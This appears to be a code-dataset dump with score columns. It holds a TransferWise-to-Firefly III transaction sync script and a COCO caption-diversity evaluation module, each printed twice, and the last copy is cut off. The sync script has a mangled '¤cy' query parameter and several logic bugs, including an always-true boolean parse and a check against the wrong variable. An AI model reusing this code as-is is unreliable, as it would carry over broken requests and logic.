| 0.756447 | 0.355719 |
import csv
import json
import logging
import os
import urllib3
import time
from datetime import datetime, timedelta
from typing import List
# Globals
TRANSFERWISE_BASE_URI = None
FIREFLY_BASE_URI = None
category_map = {}
currency_accounts = {}
logging.getLogger().setLevel(logging.INFO)
http = urllib3.PoolManager()
def main():
global TRANSFERWISE_BASE_URI
global FIREFLY_BASE_URI
global category_map
global currency_accounts
validate_env()
TRANSFERWISE_BASE_URI = os.environ['TRANSFERWISE_BASE_URI']
FIREFLY_BASE_URI = os.environ['FIREFLY_BASE_URI']
if not os.path.exists('config/categories-map.json'):
logging.error("categories-map.json not found, exiting.")
exit(1)
with open('config/categories-map.json', 'r') as fp:
category_map = json.load(fp)
if not os.path.exists('config/accounts.json'):
logging.error("accounts.json not found, exiting.")
exit(1)
with open('config/accounts.json', 'r') as fp:
currency_accounts = json.load(fp)
tranferwise_user_id = get_user_id()
tranferwise_account_id = get_account_id()
# Calculate the difference in days, batch it by 180 if larger
end = datetime.utcnow()
start = datetime.utcnow() - timedelta(days=int(os.environ['FETCH_PERIOD'])) - timedelta(seconds=1)
while (end - start).days > 0:
period_length = min((end - start).days % 180, 180)
period_end = start + timedelta(days=period_length)
for currency in currency_accounts:
logging.info(
f"Fetching {currency} transactions between {start.strftime('%Y-%m-%d')} and {period_end.strftime('%Y-%m-%d')}")
transactions = fetch_txs_from_transferwise(tranferwise_user_id, tranferwise_account_id, currency, start,
period_end)
logging.info(f"Writing {len(transactions)} transactions.")
for transaction in transactions:
if transaction.currency_code not in currency_accounts:
logging.error(f"{transaction.currency_code} not found in accounts.json")
exit(1)
account_id = currency_accounts[transaction.currency_code]
post_tx_to_firefly(transaction, account_id)
start = start + timedelta(days=period_length + 1)
def validate_env():
"""
Check that either the .env or ENV contains the required values.
:return:
"""
def check_string(key: str, expected_type: str):
try:
if os.environ[key] is None or os.environ[key] == '':
raise KeyError()
if expected_type == 'str':
str(os.environ[key])
if expected_type == 'int':
int(os.environ[key])
if expected_type == 'bool':
if str(os.environ[key]).lower() not in ['true', 'false']:
raise ValueError
except (KeyError, ValueError) as e:
logging.error(f"{key} was not set correctly in .env or ENV, please provide a valid {expected_type}.")
exit(1)
check_string('TRANSFERWISE_BASE_URI', 'str')
check_string('FIREFLY_BASE_URI', 'str')
check_string('TRANSFERWISE_TOKEN', 'str')
check_string('FIREFLY_TOKEN', 'str')
check_string('FETCH_PERIOD', 'int')
check_string('FETCH_CURRENCIES', 'str')
check_string('CONVERT_AMOUNTS', 'bool')
check_string('BASE_CURRENCY', 'GBP')
class Transaction:
id: str
tx_type: str
date: datetime
amount: float
currency_code: str
category_name: str
foreign_code: str
foreign_amount: float
raw_category: str
budget_name: str
description: str
notes: str
source_id: str
destination_id: str
reconciled: bool
def __init__(self, id: str, tx_type: str, date: datetime, amount: float, currency_code: str, foreign_code: str,
foreign_amount: float, raw_category: str, description: str, notes: str):
self.id = id
self.tx_type = tx_type
self.date = date.replace(microsecond=0)
self.amount = amount
self.currency_code = currency_code
self.foreign_code = foreign_code
self.foreign_amount = foreign_amount
self.description = description
self.notes = notes
self.source_id = self.determine_account() if type == 'DEBIT' else None
self.destination_id = None if type == 'DEBIT' else self.determine_account()
self.reconciled = True
self.raw_category = raw_category
self.category_name = self.determine_category()
self.budget_name = self.determine_budget()
def determine_category(self):
global category_map
if self.raw_category == '':
return None
if self.raw_category in category_map:
return category_map[self.raw_category]['category']
logging.error(f"Category seen in transaction but not in category_map: '{self.raw_category}'.")
if 'Converted' in self.description or 'Received' in self.description:
return None
if self.description == 'Sent money to Homerental Nordic AB':
return None
return 'Other'
def determine_budget(self):
global category_map
if self.raw_category == '':
return None
if self.raw_category in category_map:
return category_map[self.raw_category]['budget']
logging.error(f"Category seen in transaction but not in category_map: '{self.raw_category}'.")
if 'Converted' in self.description or 'Received' in self.description:
return None
if self.description == 'Sent money to Homerental Nordic AB':
return None
return 'Other'
def determine_account(self):
global currency_accounts
return currency_accounts[self.currency_code]
def get_user_id() -> str:
return "3750372"
def get_account_id() -> str:
return "4067808"
def fetch_exchange_rate_from_yahoo(from_code: str, to_code: str, start: datetime, end: datetime, retry=0) -> \
{str: float}:
"""
Fetch exchange rates from Yahoo Finance between two dates.
Little bit tricky, as some pairs don't trade over the weekend.
If any day between `start` and `end` was a non-trading day, use the previous or next rate seen.
:param from_code:
:param to_code:
:param start:
:param end:
:param retry:
:return:
"""
if retry > 4:
logging.error("Failed to fetch from Yahoo after 5 attempts, giving up.")
res = http.request('GET', f"https://query1.finance.yahoo.com/v7/finance/download/{from_code}{to_code}=X?period1={int(start.timestamp())}&period2={int(end.timestamp())}&interval=1d&events=history") # noqa E401
if res.status != 200:
time.sleep(5)
return fetch_exchange_rate_from_yahoo(from_code, to_code, start, end, retry + 1)
rates = {}
last_seen = None
rows = list(csv.reader(res.data.decode().split("\n")))[1:]
results = {row[0]: row[4] for row in rows}
end = end + timedelta(days=1)
for date in [start + timedelta(days=n) for n in range((end - start).days)]:
formatted_date = date.strftime("%Y-%m-%d")
if formatted_date not in results:
rates[formatted_date] = rows[0][4] if last_seen is None else last_seen
continue
rates[formatted_date] = results[formatted_date]
last_seen = results[formatted_date]
return {date: float(rate) for date, rate in rates.items()}
def fetch_txs_from_transferwise(user_id: str, account_id: str, currency: str, start: datetime, end: datetime) -> \
List[Transaction]:
"""
Fetch transactions from TransferWise
:param user_id:
:param account_id:
:param currency:
:param start:
:param end:
:return:
"""
global TRANSFERWISE_BASE_URI
global category_map
global currency_accounts
start = start.replace(microsecond=0)
end = end.replace(microsecond=0)
uri = f"/v3/profiles/{user_id}/borderless-accounts/{account_id}/statement.json?intervalStart={start.isoformat()}Z&intervalEnd={end.isoformat()}Z¤cy={currency}"
res = http.request("GET", f"{TRANSFERWISE_BASE_URI}{uri}", headers={
'Authorization': 'Bearer ' + os.environ['TRANSFERWISE_TOKEN']
})
if res.status == 401:
logging.error('Unauthorized response fetching transactions, check API token.')
exit()
if res.status != 200:
logging.error(f'Failed to fetch transactions for a non-auth reason. {res.status}: {res.content.decode()}')
exit()
fx_rates = {}
convert_amounts = bool(os.environ['CONVERT_AMOUNTS'])
if convert_amounts and currency != os.environ['BASE_CURRENCY']:
fx_rates = fetch_exchange_rate_from_yahoo(from_code=currency, to_code=os.environ['BASE_CURRENCY'], start=start,
end=end)
body = json.loads(res.data.decode("utf-8"))
transactions = []
for row in body['transactions']:
currency_code = row['amount']['currency']
reference = row['referenceNumber']
amount = abs(row['amount']['value'])
tx_type = row['type']
category = row['details']['category'] if 'category' in row['details'] else ''
date = datetime.strptime(row['date'], '%Y-%m-%dT%H:%M:%S.%fZ')
description = row['details']['description'].replace("Card transaction of ", '')
raw = row
foreign_amount = 0.0
if convert_amounts and currency != os.environ['BASE_CURRENCY']:
fx_date = date.strftime("%Y-%m-%d")
foreign_amount = round(fx_rates[fx_date] * amount, 2)
raw['foreignAmount'] = foreign_amount
raw['foreignFxRate'] = fx_rates[fx_date]
tx = Transaction(id=reference, amount=amount, tx_type=tx_type, raw_category=category, date=date,
description=description, currency_code=currency_code, foreign_code=os.environ['BASE_CURRENCY'],
foreign_amount=foreign_amount, notes=json.dumps(raw))
transactions.append(tx)
return transactions
def search_for_existing_tx(tx: Transaction) -> int:
"""
Searches Firefly for a Transaction with a description LIKE TransferWiseID-{currency}
Fails if it finds > 1, returns 0 if it finds 0, ID if it finds 1.
:param tx:
:return:
"""
res = http.request("GET", FIREFLY_BASE_URI + "/api/v1/search/transactions",
fields={'query': f'{tx.id}-{tx.currency_code}'}, headers={
'Authorization': 'Bearer ' + os.environ['FIREFLY_TOKEN'],
'Accept': 'application/json',
'Content-Type': 'application/json'
})
if res.status == 401:
logging.error('Unauthorized response posting transactions, check API token.')
exit()
if res.status != 200:
logging.error(f'Failed to search transactions for a non-auth reason. {res.status}: {res.data.decode()}')
exit()
body = json.loads(res.data)
if len(body['data']) > 1:
ids = [x['id'] for x in body['data']]
logging.error(f"Received more than one transaction like {tx.id}, IDs: {ids}. Please fix / report bug.")
exit(1)
if len(body['data']) == 1:
return int(body['data'][0]['id'])
return 0
def post_tx_to_firefly(tx: Transaction, account_id: str) -> bool:
"""
Form the Transaction object ready for ingestion by Firefly and post.
:param tx:
:param account_id:
:return:
"""
global FIREFLY_BASE_URI
tx_body = {
"external_id": tx.id,
"type": "deposit" if tx.tx_type in 'CREDIT' else 'withdrawal',
"date": tx.date.isoformat() + "Z",
"amount": str(tx.amount),
"currency_code": tx.currency_code,
"foreign_currency_code": None,
"foreign_amount": str(0.0),
"category_name": tx.category_name,
"budget_name": tx.budget_name,
"description": f"{tx.description} ({tx.id}-{tx.currency_code})",
"notes": tx.notes,
"source_id": account_id if tx.tx_type == 'DEBIT' else None,
"destination_id": None if tx.tx_type == 'DEBIT' else account_id,
"reconciled": True,
}
# Even if these were attempted, if the amount is 0.0 then we failed the Yahoo fetch, don't attempt it.
if tx.foreign_code != '' and tx.foreign_amount != 0.0:
# If you want to set this in Firefly, remove the pass and uncomment
pass
# tx_body['foreign_currency_code'] = tx.foreign_code
# tx_body['foreign_amount'] = str(tx.foreign_amount)
payload = {
"error_if_duplicate_hash": False,
"apply_rules": False,
"group_title": "TW",
"transactions": [tx_body]
}
existing_id = search_for_existing_tx(tx)
if existing_id != 0:
res = http.request("PUT", f"{FIREFLY_BASE_URI}/api/v1/transactions/{existing_id}", body=json.dumps(payload), headers={
'Authorization': 'Bearer ' + os.environ['FIREFLY_TOKEN'],
'Accept': 'application/json',
'Content-Type': 'application/json'
})
else:
res = http.request("POST", f"{FIREFLY_BASE_URI}/api/v1/transactions", body=json.dumps(payload), headers={
'Authorization': 'Bearer ' + os.environ['FIREFLY_TOKEN'],
'Accept': 'application/json',
'Content-Type': 'application/json'
})
if res.status == 422:
logging.error(f'Failed to put transaction {tx.id}: {res.data.decode()}')
return True
if res.status == 401:
logging.error('Unauthorized response posting transactions, check API token.')
exit()
if res.status != 200:
logging.error(f'Failed to post transactions for a non-auth reason. {res.status}: {res.data.decode()}')
exit()
return True
if __name__ == '__main__':
main()
|
transferwise/src/main.py
|
import csv
import json
import logging
import os
import urllib3
import time
from datetime import datetime, timedelta
from typing import List
# Globals
TRANSFERWISE_BASE_URI = None
FIREFLY_BASE_URI = None
category_map = {}
currency_accounts = {}
logging.getLogger().setLevel(logging.INFO)
http = urllib3.PoolManager()
def main():
global TRANSFERWISE_BASE_URI
global FIREFLY_BASE_URI
global category_map
global currency_accounts
validate_env()
TRANSFERWISE_BASE_URI = os.environ['TRANSFERWISE_BASE_URI']
FIREFLY_BASE_URI = os.environ['FIREFLY_BASE_URI']
if not os.path.exists('config/categories-map.json'):
logging.error("categories-map.json not found, exiting.")
exit(1)
with open('config/categories-map.json', 'r') as fp:
category_map = json.load(fp)
if not os.path.exists('config/accounts.json'):
logging.error("accounts.json not found, exiting.")
exit(1)
with open('config/accounts.json', 'r') as fp:
currency_accounts = json.load(fp)
tranferwise_user_id = get_user_id()
tranferwise_account_id = get_account_id()
# Calculate the difference in days, batch it by 180 if larger
end = datetime.utcnow()
start = datetime.utcnow() - timedelta(days=int(os.environ['FETCH_PERIOD'])) - timedelta(seconds=1)
while (end - start).days > 0:
period_length = min((end - start).days % 180, 180)
period_end = start + timedelta(days=period_length)
for currency in currency_accounts:
logging.info(
f"Fetching {currency} transactions between {start.strftime('%Y-%m-%d')} and {period_end.strftime('%Y-%m-%d')}")
transactions = fetch_txs_from_transferwise(tranferwise_user_id, tranferwise_account_id, currency, start,
period_end)
logging.info(f"Writing {len(transactions)} transactions.")
for transaction in transactions:
if transaction.currency_code not in currency_accounts:
logging.error(f"{transaction.currency_code} not found in accounts.json")
exit(1)
account_id = currency_accounts[transaction.currency_code]
post_tx_to_firefly(transaction, account_id)
start = start + timedelta(days=period_length + 1)
def validate_env():
"""
Check that either the .env or ENV contains the required values.
:return:
"""
def check_string(key: str, expected_type: str):
try:
if os.environ[key] is None or os.environ[key] == '':
raise KeyError()
if expected_type == 'str':
str(os.environ[key])
if expected_type == 'int':
int(os.environ[key])
if expected_type == 'bool':
if str(os.environ[key]).lower() not in ['true', 'false']:
raise ValueError
except (KeyError, ValueError) as e:
logging.error(f"{key} was not set correctly in .env or ENV, please provide a valid {expected_type}.")
exit(1)
check_string('TRANSFERWISE_BASE_URI', 'str')
check_string('FIREFLY_BASE_URI', 'str')
check_string('TRANSFERWISE_TOKEN', 'str')
check_string('FIREFLY_TOKEN', 'str')
check_string('FETCH_PERIOD', 'int')
check_string('FETCH_CURRENCIES', 'str')
check_string('CONVERT_AMOUNTS', 'bool')
check_string('BASE_CURRENCY', 'GBP')
class Transaction:
id: str
tx_type: str
date: datetime
amount: float
currency_code: str
category_name: str
foreign_code: str
foreign_amount: float
raw_category: str
budget_name: str
description: str
notes: str
source_id: str
destination_id: str
reconciled: bool
def __init__(self, id: str, tx_type: str, date: datetime, amount: float, currency_code: str, foreign_code: str,
foreign_amount: float, raw_category: str, description: str, notes: str):
self.id = id
self.tx_type = tx_type
self.date = date.replace(microsecond=0)
self.amount = amount
self.currency_code = currency_code
self.foreign_code = foreign_code
self.foreign_amount = foreign_amount
self.description = description
self.notes = notes
self.source_id = self.determine_account() if type == 'DEBIT' else None
self.destination_id = None if type == 'DEBIT' else self.determine_account()
self.reconciled = True
self.raw_category = raw_category
self.category_name = self.determine_category()
self.budget_name = self.determine_budget()
def determine_category(self):
global category_map
if self.raw_category == '':
return None
if self.raw_category in category_map:
return category_map[self.raw_category]['category']
logging.error(f"Category seen in transaction but not in category_map: '{self.raw_category}'.")
if 'Converted' in self.description or 'Received' in self.description:
return None
if self.description == 'Sent money to Homerental Nordic AB':
return None
return 'Other'
def determine_budget(self):
global category_map
if self.raw_category == '':
return None
if self.raw_category in category_map:
return category_map[self.raw_category]['budget']
logging.error(f"Category seen in transaction but not in category_map: '{self.raw_category}'.")
if 'Converted' in self.description or 'Received' in self.description:
return None
if self.description == 'Sent money to Homerental Nordic AB':
return None
return 'Other'
def determine_account(self):
global currency_accounts
return currency_accounts[self.currency_code]
def get_user_id() -> str:
return "3750372"
def get_account_id() -> str:
return "4067808"
def fetch_exchange_rate_from_yahoo(from_code: str, to_code: str, start: datetime, end: datetime, retry=0) -> \
{str: float}:
"""
Fetch exchange rates from Yahoo Finance between two dates.
Little bit tricky, as some pairs don't trade over the weekend.
If any day between `start` and `end` was a non-trading day, use the previous or next rate seen.
:param from_code:
:param to_code:
:param start:
:param end:
:param retry:
:return:
"""
if retry > 4:
logging.error("Failed to fetch from Yahoo after 5 attempts, giving up.")
res = http.request('GET', f"https://query1.finance.yahoo.com/v7/finance/download/{from_code}{to_code}=X?period1={int(start.timestamp())}&period2={int(end.timestamp())}&interval=1d&events=history") # noqa E401
if res.status != 200:
time.sleep(5)
return fetch_exchange_rate_from_yahoo(from_code, to_code, start, end, retry + 1)
rates = {}
last_seen = None
rows = list(csv.reader(res.data.decode().split("\n")))[1:]
results = {row[0]: row[4] for row in rows}
end = end + timedelta(days=1)
for date in [start + timedelta(days=n) for n in range((end - start).days)]:
formatted_date = date.strftime("%Y-%m-%d")
if formatted_date not in results:
rates[formatted_date] = rows[0][4] if last_seen is None else last_seen
continue
rates[formatted_date] = results[formatted_date]
last_seen = results[formatted_date]
return {date: float(rate) for date, rate in rates.items()}
def fetch_txs_from_transferwise(user_id: str, account_id: str, currency: str, start: datetime, end: datetime) -> \
List[Transaction]:
"""
Fetch transactions from TransferWise
:param user_id:
:param account_id:
:param currency:
:param start:
:param end:
:return:
"""
global TRANSFERWISE_BASE_URI
global category_map
global currency_accounts
start = start.replace(microsecond=0)
end = end.replace(microsecond=0)
uri = f"/v3/profiles/{user_id}/borderless-accounts/{account_id}/statement.json?intervalStart={start.isoformat()}Z&intervalEnd={end.isoformat()}Z¤cy={currency}"
res = http.request("GET", f"{TRANSFERWISE_BASE_URI}{uri}", headers={
'Authorization': 'Bearer ' + os.environ['TRANSFERWISE_TOKEN']
})
if res.status == 401:
logging.error('Unauthorized response fetching transactions, check API token.')
exit()
if res.status != 200:
logging.error(f'Failed to fetch transactions for a non-auth reason. {res.status}: {res.content.decode()}')
exit()
fx_rates = {}
convert_amounts = bool(os.environ['CONVERT_AMOUNTS'])
if convert_amounts and currency != os.environ['BASE_CURRENCY']:
fx_rates = fetch_exchange_rate_from_yahoo(from_code=currency, to_code=os.environ['BASE_CURRENCY'], start=start,
end=end)
body = json.loads(res.data.decode("utf-8"))
transactions = []
for row in body['transactions']:
currency_code = row['amount']['currency']
reference = row['referenceNumber']
amount = abs(row['amount']['value'])
tx_type = row['type']
category = row['details']['category'] if 'category' in row['details'] else ''
date = datetime.strptime(row['date'], '%Y-%m-%dT%H:%M:%S.%fZ')
description = row['details']['description'].replace("Card transaction of ", '')
raw = row
foreign_amount = 0.0
if convert_amounts and currency != os.environ['BASE_CURRENCY']:
fx_date = date.strftime("%Y-%m-%d")
foreign_amount = round(fx_rates[fx_date] * amount, 2)
raw['foreignAmount'] = foreign_amount
raw['foreignFxRate'] = fx_rates[fx_date]
tx = Transaction(id=reference, amount=amount, tx_type=tx_type, raw_category=category, date=date,
description=description, currency_code=currency_code, foreign_code=os.environ['BASE_CURRENCY'],
foreign_amount=foreign_amount, notes=json.dumps(raw))
transactions.append(tx)
return transactions
def search_for_existing_tx(tx: Transaction) -> int:
"""
Searches Firefly for a Transaction with a description LIKE TransferWiseID-{currency}
Fails if it finds > 1, returns 0 if it finds 0, ID if it finds 1.
:param tx:
:return:
"""
res = http.request("GET", FIREFLY_BASE_URI + "/api/v1/search/transactions",
fields={'query': f'{tx.id}-{tx.currency_code}'}, headers={
'Authorization': 'Bearer ' + os.environ['FIREFLY_TOKEN'],
'Accept': 'application/json',
'Content-Type': 'application/json'
})
if res.status == 401:
logging.error('Unauthorized response posting transactions, check API token.')
exit()
if res.status != 200:
logging.error(f'Failed to search transactions for a non-auth reason. {res.status}: {res.data.decode()}')
exit()
body = json.loads(res.data)
if len(body['data']) > 1:
ids = [x['id'] for x in body['data']]
logging.error(f"Received more than one transaction like {tx.id}, IDs: {ids}. Please fix / report bug.")
exit(1)
if len(body['data']) == 1:
return int(body['data'][0]['id'])
return 0
def post_tx_to_firefly(tx: Transaction, account_id: str) -> bool:
"""
Form the Transaction object ready for ingestion by Firefly and post.
:param tx:
:param account_id:
:return:
"""
global FIREFLY_BASE_URI
tx_body = {
"external_id": tx.id,
"type": "deposit" if tx.tx_type in 'CREDIT' else 'withdrawal',
"date": tx.date.isoformat() + "Z",
"amount": str(tx.amount),
"currency_code": tx.currency_code,
"foreign_currency_code": None,
"foreign_amount": str(0.0),
"category_name": tx.category_name,
"budget_name": tx.budget_name,
"description": f"{tx.description} ({tx.id}-{tx.currency_code})",
"notes": tx.notes,
"source_id": account_id if tx.tx_type == 'DEBIT' else None,
"destination_id": None if tx.tx_type == 'DEBIT' else account_id,
"reconciled": True,
}
# Even if these were attempted, if the amount is 0.0 then we failed the Yahoo fetch, don't attempt it.
if tx.foreign_code != '' and tx.foreign_amount != 0.0:
# If you want to set this in Firefly, remove the pass and uncomment
pass
# tx_body['foreign_currency_code'] = tx.foreign_code
# tx_body['foreign_amount'] = str(tx.foreign_amount)
payload = {
"error_if_duplicate_hash": False,
"apply_rules": False,
"group_title": "TW",
"transactions": [tx_body]
}
existing_id = search_for_existing_tx(tx)
if existing_id != 0:
res = http.request("PUT", f"{FIREFLY_BASE_URI}/api/v1/transactions/{existing_id}", body=json.dumps(payload), headers={
'Authorization': 'Bearer ' + os.environ['FIREFLY_TOKEN'],
'Accept': 'application/json',
'Content-Type': 'application/json'
})
else:
res = http.request("POST", f"{FIREFLY_BASE_URI}/api/v1/transactions", body=json.dumps(payload), headers={
'Authorization': 'Bearer ' + os.environ['FIREFLY_TOKEN'],
'Accept': 'application/json',
'Content-Type': 'application/json'
})
if res.status == 422:
logging.error(f'Failed to put transaction {tx.id}: {res.data.decode()}')
return True
if res.status == 401:
logging.error('Unauthorized response posting transactions, check API token.')
exit()
if res.status != 200:
logging.error(f'Failed to post transactions for a non-auth reason. {res.status}: {res.data.decode()}')
exit()
return True
if __name__ == '__main__':
main()
| 0.595375 | 0.145358 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import numpy as np
import json
from json import encoder
import random
import string
import time
import os
import sys
from . import misc as utils
from .eval_utils import getCOCO
from .div_utils import compute_div_n, compute_global_div_n
SPICE_THREADS=4
import sys
try:
sys.path.append("coco-caption")
annFile = 'coco-caption/annotations/captions_val2014.json'
from pycocotools.coco import COCO
from pycocoevalcap.eval import COCOEvalCap
from pycocoevalcap.eval_spice import COCOEvalCapSpice
from pycocoevalcap.tokenizer.ptbtokenizer import PTBTokenizer
from pycocoevalcap.bleu.bleu import Bleu
sys.path.append("cider")
from pyciderevalcap.cider.cider import Cider
except:
print('Warning: requirements for eval_multi not satisfied')
def eval_allspice(dataset, preds_n, model_id, split):
coco = getCOCO(dataset)
valids = coco.getImgIds()
capsById = {}
for d in preds_n:
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
# filter results to only those in MSCOCO validation set (will be about a third)
preds_filt_n = [p for p in preds_n if p['image_id'] in valids]
print('using %d/%d predictions_n' % (len(preds_filt_n), len(preds_n)))
cache_path_n = os.path.join('eval_results/', model_id + '_' + split + '_n.json')
json.dump(preds_filt_n, open(cache_path_n, 'w')) # serialize to temporary json file. Sigh, COCO API...
# Eval AllSPICE
cocoRes_n = coco.loadRes(cache_path_n)
cocoEvalAllSPICE = COCOEvalCapSpice(coco, cocoRes_n)
cocoEvalAllSPICE.params['image_id'] = cocoRes_n.getImgIds()
cocoEvalAllSPICE.evaluate()
out = {}
for metric, score in cocoEvalAllSPICE.eval.items():
out['All'+metric] = score
imgToEvalAllSPICE = cocoEvalAllSPICE.imgToEval
# collect SPICE_sub_score
for k in list(imgToEvalAllSPICE.values())[0]['SPICE'].keys():
if k != 'All':
out['AllSPICE_'+k] = np.array([v['SPICE'][k]['f'] for v in imgToEvalAllSPICE.values()])
out['AllSPICE_'+k] = (out['AllSPICE_'+k][out['AllSPICE_'+k]==out['AllSPICE_'+k]]).mean()
for p in preds_filt_n:
image_id, caption = p['image_id'], p['caption']
imgToEvalAllSPICE[image_id]['caption'] = capsById[image_id]
return {'overall': out, 'imgToEvalAllSPICE': imgToEvalAllSPICE}
def eval_oracle(dataset, preds_n, model_id, split):
cache_path = os.path.join('eval_results/', model_id + '_' + split + '_n.json')
coco = getCOCO(dataset)
valids = coco.getImgIds()
capsById = {}
for d in preds_n:
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
sample_n = capsById[list(capsById.keys())[0]]
for i in range(len(capsById[list(capsById.keys())[0]])):
preds = [_[i] for _ in capsById.values()]
json.dump(preds, open(cache_path, 'w')) # serialize to temporary json file. Sigh, COCO API...
cocoRes = coco.loadRes(cache_path)
cocoEval = COCOEvalCap(coco, cocoRes, spice_threads=SPICE_THREADS)
cocoEval.params['image_id'] = cocoRes.getImgIds()
cocoEval.evaluate()
imgToEval = cocoEval.imgToEval
for img_id in capsById.keys():
tmp = imgToEval[img_id]
for k in tmp['SPICE'].keys():
if k != 'All':
tmp['SPICE_'+k] = tmp['SPICE'][k]['f']
if tmp['SPICE_'+k] != tmp['SPICE_'+k]: # nan
tmp['SPICE_'+k] = -100
tmp['SPICE'] = tmp['SPICE']['All']['f']
if tmp['SPICE'] != tmp['SPICE']: tmp['SPICE'] = -100
capsById[img_id][i]['scores'] = imgToEval[img_id]
out = {'overall': {}, 'ImgToEval': {}}
for img_id in capsById.keys():
out['ImgToEval'][img_id] = {}
for metric in capsById[img_id][0]['scores'].keys():
if metric == 'image_id': continue
out['ImgToEval'][img_id]['oracle_'+metric] = max([_['scores'][metric] for _ in capsById[img_id]])
out['ImgToEval'][img_id]['avg_'+metric] = sum([_['scores'][metric] for _ in capsById[img_id]]) / len(capsById[img_id])
out['ImgToEval'][img_id]['captions'] = capsById[img_id]
for metric in list(out['ImgToEval'].values())[0].keys():
if metric == 'captions':
continue
tmp = np.array([_[metric] for _ in out['ImgToEval'].values()])
tmp = tmp[tmp!=-100]
out['overall'][metric] = tmp.mean()
return out
def eval_div_stats(dataset, preds_n, model_id, split):
tokenizer = PTBTokenizer()
capsById = {}
for i, d in enumerate(preds_n):
d['id'] = i
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
n_caps_perimg = len(capsById[list(capsById.keys())[0]])
print(n_caps_perimg)
_capsById = capsById # save the untokenized version
capsById = tokenizer.tokenize(capsById)
div_1, adiv_1 = compute_div_n(capsById,1)
div_2, adiv_2 = compute_div_n(capsById,2)
globdiv_1, _= compute_global_div_n(capsById,1)
print('Diversity Statistics are as follows: \n Div1: %.2f, Div2: %.2f, gDiv1: %d\n'%(div_1,div_2, globdiv_1))
# compute mbleu
scorer = Bleu(4)
all_scrs = []
scrperimg = np.zeros((n_caps_perimg, len(capsById)))
for i in range(n_caps_perimg):
tempRefsById = {}
candsById = {}
for k in capsById:
tempRefsById[k] = capsById[k][:i] + capsById[k][i+1:]
candsById[k] = [capsById[k][i]]
score, scores = scorer.compute_score(tempRefsById, candsById)
all_scrs.append(score)
scrperimg[i,:] = scores[1]
all_scrs = np.array(all_scrs)
out = {}
out['overall'] = {'Div1': div_1, 'Div2': div_2, 'gDiv1': globdiv_1}
for k, score in zip(range(4), all_scrs.mean(axis=0).tolist()):
out['overall'].update({'mBLeu_%d'%(k+1): score})
imgToEval = {}
for i,imgid in enumerate(capsById.keys()):
imgToEval[imgid] = {'mBleu_2' : scrperimg[:,i].mean()}
imgToEval[imgid]['individuals'] = []
for j, d in enumerate(_capsById[imgid]):
imgToEval[imgid]['individuals'].append(preds_n[d['id']])
imgToEval[imgid]['individuals'][-1]['mBleu_2'] = scrperimg[j,i]
out['ImgToEval'] = imgToEval
print('Mean mutual Bleu scores on this set is:\nmBLeu_1, mBLeu_2, mBLeu_3, mBLeu_4')
print(all_scrs.mean(axis=0))
return out
def eval_self_cider(dataset, preds_n, model_id, split):
cache_path = os.path.join('eval_results/', model_id + '_' + split + '_n.json')
coco = getCOCO(dataset)
valids = coco.getImgIds()
# Get Cider_scorer
Cider_scorer = Cider(df='corpus')
tokenizer = PTBTokenizer()
gts = {}
for imgId in valids:
gts[imgId] = coco.imgToAnns[imgId]
gts = tokenizer.tokenize(gts)
for imgId in valids:
Cider_scorer.cider_scorer += (None, gts[imgId])
Cider_scorer.cider_scorer.compute_doc_freq()
Cider_scorer.cider_scorer.ref_len = np.log(float(len(Cider_scorer.cider_scorer.crefs)))
# Prepare captions
capsById = {}
for d in preds_n:
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
capsById = tokenizer.tokenize(capsById)
imgIds = list(capsById.keys())
scores = Cider_scorer.my_self_cider([capsById[_] for _ in imgIds])
def get_div(eigvals):
eigvals = np.clip(eigvals, 0, None)
return -np.log(np.sqrt(eigvals[-1]) / (np.sqrt(eigvals).sum())) / np.log(len(eigvals))
sc_scores = [get_div(np.linalg.eigvalsh(_/10)) for _ in scores]
score = np.mean(np.array(sc_scores))
imgToEval = {}
for i, image_id in enumerate(imgIds):
imgToEval[image_id] = {'self_cider': sc_scores[i], 'self_cider_mat': scores[i].tolist()}
return {'overall': {'self_cider': score}, 'imgToEval': imgToEval}
return score
|
captioning/utils/eval_multi.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import numpy as np
import json
from json import encoder
import random
import string
import time
import os
import sys
from . import misc as utils
from .eval_utils import getCOCO
from .div_utils import compute_div_n, compute_global_div_n
SPICE_THREADS=4
import sys
try:
sys.path.append("coco-caption")
annFile = 'coco-caption/annotations/captions_val2014.json'
from pycocotools.coco import COCO
from pycocoevalcap.eval import COCOEvalCap
from pycocoevalcap.eval_spice import COCOEvalCapSpice
from pycocoevalcap.tokenizer.ptbtokenizer import PTBTokenizer
from pycocoevalcap.bleu.bleu import Bleu
sys.path.append("cider")
from pyciderevalcap.cider.cider import Cider
except:
print('Warning: requirements for eval_multi not satisfied')
def eval_allspice(dataset, preds_n, model_id, split):
coco = getCOCO(dataset)
valids = coco.getImgIds()
capsById = {}
for d in preds_n:
capsById[d['image_id']] = capsById.get(d['image_id'], []) + [d]
# filter results to only those in MSCOCO validation set (will be about a third)
preds_filt_n = [p for p in preds_n if p['image_id'] in valids]
print('using %d/%d predictions_n' % (len(preds_filt_n), len(preds_n)))
cache_path_n = os.path.join('eval_results/', model_id + '_' + split + '_n.json')
json.dump(preds_filt_n, open(cache_path_n, 'w')) # serialize to temporary json file. Sigh, COCO API...
# Eval AllSPICE
cocoRes_n = coco.loadRes(cache_path_n)
cocoEvalAllSPICE = COCOEvalCapSpice(coco, cocoRes_n)
cocoEvalAllSPICE.params['image_id'] = cocoRes_n.getImgIds()
cocoEvalAllSPICE.evaluate()
out = {}
for metric, score in cocoEvalAllSPICE.eval.items():
out['All'+metric] = score
imgToEvalAllSPICE = cocoEvalAllSPICE.imgToEval
# collect SPICE_sub_score
for k in list(imgToEvalAllSPICE.values())[0]['SPICE'].keys():
if k != 'All':
out['AllSPICE_'+k] = np.array([v['SPICE'][k]['f'] for v in imgToEvalAllSPICE.values()])
out['AllSPICE_'+k] = (out['AllSPICE_'+k][out['AllSPICE_'+k]==out['AllSPICE_'+k]]).mean()
for p in preds_filt_n:
image_id, caption = p['image_id'], p['caption']
imgToEvalAllSPICE[image_id]['caption'] = capsById[image_id]
return {'overall': out, 'imgToEvalAllSPICE': imgToEvalAllSPICE}
def eval_oracle(dataset, preds_n, model_id, split):
cache_path = os.path.join('eval_results/', model_id + '_' + split + '_n.json')
coco = getCOCO(dataset)
valids = coco.getImgIds()
capsById = {}
